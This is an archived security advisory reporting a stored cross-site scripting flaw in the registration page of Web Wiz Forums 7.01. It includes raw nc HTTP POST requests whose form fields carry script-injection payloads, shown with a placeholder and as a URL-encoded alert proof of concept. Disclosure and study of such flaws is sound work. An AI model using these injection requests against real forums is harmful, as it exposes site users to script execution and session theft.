TUCoPS :: Web BBS :: etc :: bt1720.txt

Web Wiz Forums ver. 7.01 


Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Website : http://www.webwizforums.com
Problems : Permanent XSS


Objects :
°°°°°°°
- register_new_user.asp
- register.asp

The values variable are not filtered:

strLocation = Request.Form("location")
strMessage = Request.Form("signature")
strPassword = Request.Form("password")


Exploits :
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF

P.S. The value NAME should coincide with whose that by a nick from a forum !!!


Example:
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF


Patch/More Details :
°°°°°°°°°°°°°°°°°°
There was no opportunity to check up it on the version 7.5 and 7.51 :(
Waiting for the reply from technical support at http://www.webwizforums.com ...


[ Local time 21:50   | Ïpîêëÿòàÿ éöóêåí, è êàê ñ íåé òîëüêî ëþäè æèâóò... ]
[ Copyright by [HEX] | mailto:hex@hex.net.ru ]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH